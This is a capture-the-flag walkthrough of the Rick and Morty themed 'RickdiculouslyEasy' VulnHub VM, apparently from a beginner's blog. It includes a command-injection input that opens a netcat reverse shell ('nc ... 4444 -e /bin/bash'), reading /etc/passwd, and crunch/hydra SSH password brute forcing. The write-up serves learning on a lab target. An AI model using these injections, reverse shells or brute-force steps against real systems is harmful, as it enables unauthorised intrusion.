So here is some information about the challenge from the creator:
This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.
It’s designed to be a beginner ctf, if you’re new to pen testing, check it out!
https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
Some feedback from me before you start reading!
This image is perfect for beginners or students.
Its is themed by Rick&Morty series. I am a huge fun so I really enjoyed it but even if you don’t watch the series you will definitely have fun. But seriously, start the series.
Interesting challenges that are connected to each other that cover a variety of fields and tools.
Generally a really really fun to play boot2root, maybe one of the best I have ever played.
MAKE YOURSELF A FAVOR AND PLAY IT. DONT TAKE TO MANY SNEAKPICKS. ITS PRETTY DO-ABLE
Starting with an Nmap scan
nmap -sS -sU -T4 -A -v 192.168.2.2
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt |_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.2.9 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh? | fingerprint-strings: | NULL: |_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64) 80/tcp open http Apache httpd 2.4.27 ((Fedora)) | http-methods: | Supported Methods: HEAD GET POST OPTIONS TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.27 (Fedora) |_http-title: Morty's Website 9090/tcp open http Cockpit web service | http-methods: |_ Supported Methods: GET HEAD |_http-title: Did not follow redirect to https://192.168.2.2:9090/
Lets connect to the ftp
ftp 192.168.2.2
Connected to 192.168.2.2. 220 (vsFTPd 3.0.3) Name (192.168.2.2:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt drwxr-xr-x 2 0 0 6 Feb 12 2017 pub 226 Directory send OK. ftp>
POINTS: 10
POINTS_TO_GO: 120
vsftpd 3.0.3 no vulnerabilities from searchsploit
We could bruteforce but not for now.
Lets try to login with SSH on port 22
ssh 192.168.2.2: ssh_exchange_identification: Connection closed by remote host Nothing we can do. Also no version was identified by Nmap
Lets move on to port 80
nikto -h 192.168.2.2
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.2.2 + Target Hostname: 192.168.2.2 + Target Port: 80 + Start Time: 2019-01-08 14:52:02 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.27 (Fedora) + Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /passwords/: Directory indexing found. + OSVDB-3092: /passwords/: This might be interesting... + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 8327 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2019-01-08 14:52:40 (GMT-5) (38 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Lets open 192.168.2.2
Nothing Interesting on the page source or in the image.
Lets view /passwords
We got another flag
POINTS: 20
POINTS_TO_GO: 110
Lets open http://192.168.2.2/passwords/passwords.html
Opening the source code reveals a password “winter”
<!DOCTYPE html> <html> <head> <title>Morty's Website</title> <body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body> <!--Password: winter--> </head> </html>
Moving to robots.txt
view-source:http://192.168.2.2/cgi-bin/root_shell.cgi <html><head><title>Root Shell </title></head> --UNDER CONSTRUCTION-- <!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG--> <!--I'm sorry Morty. It's a bummer.--> </html>
I guess Rick is messing with us. That was way to good to be true. 😒
Moving to http://192.168.2.2/cgi-bin/tracertool.cgi
A super cool webpage to ping IPs.
When we try 127.0.0.1 we get a response.
Lets try to add another command after the ping
eg: 127.0.0.1; id;
DAAAMN Morty 😍, the command is successful executed and we got a text result back.
So actually now we have a stupid put fine working shell.
Everything we type after 127.0.0.1; will be executed.
So testing with the following commands to take a look at the directories did not return anything useful.
127.0.0.1; ls; 127.0.0.1; cd ..; ls; 127.0.0.1; cd ..; cd ..; ls;
Funny thing, cat command has been replaced with an ASCII cat! Well that made me laugh! 😂😂
Then I had an idea. Can I ping my machine?
An yes I can!
So lets start open a basic remote shell.
I use netcat to start listening on port 4444
nc –lvp 4444
Then I craft the new malicious “ping” command with netcat to broadcast on my IP:PORT with the /bin/bash
127.0.0.1; nc 192.168.2.9 4444 -e /bin/bash;
And I immediately get a shell back on my machine. 😎
So we got a shell that is running under the user Apache.
Tried to find other interesting files or directories for flags but with no luck.
We will return here really soon.
Lets view port 9090
And we got another flag
POINTS: 30
POINTS_TO_GO: 100
No hints in the code. Web page seems broken.
So far I have captured a few flags, found a password that never had the change to use “winter” and go a reverse shell as the low privileged user “apache”.
Ok so here I got stuck, even if it is a beginner, RICKdiculouslyEasy machine.
Pretty embarrassing I know.😭
So I Google other write ups and try to take only a sneakpeak without spoiling everything.
And I found that my Nmap scan had failed massive. I have missed really important ports.
Lets scan again, this time more carefully. (-p- parameter scans all ports 1 to 65535)
nmap -sS 192.168.2.2 -p-
Well that was painful to watch. 😱😱
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:22 EST Nmap scan report for 192.168.2.2 (192.168.2.2) Host is up (0.00058s latency). Not shown: 65528 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 9090/tcp open zeus-admin 13337/tcp open unknown 22222/tcp open easyengine 60000/tcp open unknown
Lets do some service identification on the ports I previously missed.
nmap -sS 192.168.2.2 -p 9090,13337,22222,60000 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:24 EST Nmap scan report for 192.168.2.2 (192.168.2.2) Host is up (0.00033s latency). PORT STATE SERVICE VERSION 9090/tcp open http Cockpit web service 13337/tcp open unknown 22222/tcp open ssh OpenSSH 7.5 (protocol 2.0) 60000/tcp open unknown 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port13337-TCP:V=7.70%I=7%D=1/8%Time=5C351522%P=x86_64-pc-linux-gnu%r(NU SF:LL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port60000-TCP:V=7.70%I=7%D=1/8%Time=5C351528%P=x86_64-pc-linux-gnu%r(NU SF:LL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\ SF:.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20rev SF:erse\x20shell\.\.\.\n#\x20");
We found another SSH service running on 22222 and 13337,60000 remain a mystery.
But we got a flag from the banner of service 13337
POINTS: 40
POINTS_TO_GO: 90
It also says something about a backdoor. Well that is convenient.
Lets telnet 13337.
telnet 192.168.2.2 13337
Nop, nothing.
telnet 192.168.2.2 13337 Trying 192.168.2.2... Connected to 192.168.2.2. Escape character is '^]'. FLAG:{TheyFoundMyBackDoorMorty}-10Points Connection closed by foreign host.
Moving on to port 60000
This port is interesting from the beginning as we got this strange but exciting string from the Nmap banner grab.
“Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\SF:.\n#\x20”
nc 192.168.2.2 60000
Thank you Rick! You might be a super genius asshole but I guess you kinda suck at InfoSec.
ls returns another flag
POINTS: 50
POINTS_TO_GO: 80
Lets run whoami
OMG Ricky! You filthy irresponsible animal! 😱😂😂
We are root but cant change directory strangely. ls returns only the flag.txt
I cant escape the blackhole directory. I guess the name is not random at all.
Lets move on to Port 2222
Tried to connect as root ssh root@192.168.2.2 -p 22222
The only password I know is winter.
No luck.
The good thing is that now we have an SSH service that at least accepting connections. (Port 22 was refusing any connection)
Maybe this password is for another user. I have to find other users. Other users are located on /etc/passwd.
How am I going to access this file?
Back to my netcat shell I have opened in terminal that runs as apache.
cat /etc/passwd
That fucking cat again. I totally forgot it.
I need another simple program to read the content. nano, vim wont work as I am connected from a simple nc.
I know that head show the top line of a text file. But usually new users are located on the bottom of passwd file.
So I use less
less /etc/passwd
Hell yeah!👌
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash Morty:x:1001:1001::/home/Morty:/bin/bash Summer:x:1002:1002::/home/Summer:/bin/bash
Lets try them on port 2222
ssh RickSanchez@192.168.2.2 -p 22222 RickSanchez@192.168.2.2's password: Permission denied, please try again. ssh Morty@192.168.2.2 -p 22222 Morty@192.168.2.2's password: Permission denied, please try again. ssh Summer@192.168.2.2 -p 22222 Summer@192.168.2.2's password: Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104 [Summer@desktop-7f9m85h ~]$
ls reveals another flag.
POINTS: 60
POINTS_TO_GO: 70
Ohhh I get it. Summer & Winter👀
So this is getting really interesting.
Starting with Mortys Home direcotry, I want to download his files to my local machine so I use scp.
scp -P 22222 Summer@192.168.2.2:/home/Morty/Safe_Password.jpg /root/Downloads/Morty and again scp -P 22222 Summer@192.168.2.2:/home/Morty/journal.txt.zip /root/Downloads/Morty
journal.txt.zip uses a password, no idea but I guess those two files are connected so maybe the password is in Safe_Password.jpg file.
Here is the image, nothing shows up at first sight. I guess it is time for some Steganography.
I dont know much about Steg so I googled and found some tools like exiftool, steghide, stegosuite
No luck with exiftool
No luck with steghide
No luck with stegosuite
I even manually zoom on Ricks teeth to find a secret password. Nothing😩
Stuck again.
Googled, again.
strings Safe_Password.jpg
Successfully unziped journal.txt.zip withpassword “Meeseek”
And we got another flag!
POINTS: 80
POINTS_TO_GO: 50
So now moving to /home/RickSanchez directory to download his files to our local machine.
scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/ThisDoesntContainAnyFlags/NotAFlag.txt /root/Downloads/Rick scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/RICKS_SAFE/safe /root/Downloads/Rick
So NotAFlag.txt is actually not a flag even if I am not really convinced yet. So lets keep
File safe seems like an executable. Maybe I should start run it on Ricks server.
So it is actually an executable but I cannot run it.
I tried su command but Summer is not in the sudoers group apparently.
Summer doesn’t have the proper permissions to execute the file but we dont really care cause we have already downloaded it to our host machine.
So it says something about arguments. So we have to pass an argument to the executable and I am pretty sure that would be the password.
After a few tries I opened the file with a previous flag. That safe remember? 😁
An by passing the password as an argument we successfully executed the safe.
POINTS: 100
POINTS_TO_GO: 30
So this is a password reminder for Rick.
We have to understand what does he mean by that.
Huge fan of the series but I dont remember his band (sorry rick 😋).
But god bless Google
So it is called the “The Flesh Curtains” LOL
Here is a poster
Lets follow his directions and make the password. Probably the root password from what he says.
1 uppercase character
1 digit
One of the words in my old bands name.
So we have to create a wordlist [One letter from a-z][On number 0-9][“The” or “Flesh” or “Curtains”]
Lets use crunch. I googled ALOT to find out how I can create the appropriate wordlist.
There are multiple methods but this one seemed to me the easiest one.
crunch 5 5 -t ,%The > the_wordlist.txt crunch 7 7 -t ,%Flesh > flesh_wordlist.txt crunch 10 10 -t ,%Curtains > curtains_wordlist.txt
And verifying the results
Lets fire up Hydra to brute force
hydra -l root -P the_wordlist.txt ssh://192.168.2.2 -s 22222 FAIL hydra -l root -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222 FAIL hydra -l root -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222 FAIL
Starting to freak out…😧
hydra -l RickSanchez -P the_wordlist.txt ssh://192.168.2.2 -s 22222 FAIL hydra -l RickSanchez -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222 FAIL hydra -l RickSanchez -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222
SUCCESS! P7Curtains is the password
Now lets connect.
FINALLY!
Now Rick mentioned that “sudo is wheely good!”
Lets try su command again. And success we a root and found the last flag.
POINTS: 130
POINTS_TO_GO: 0
——————————————
Lessons learned:
1) I should be more careful with port scanning.
2) I should practice more on steg.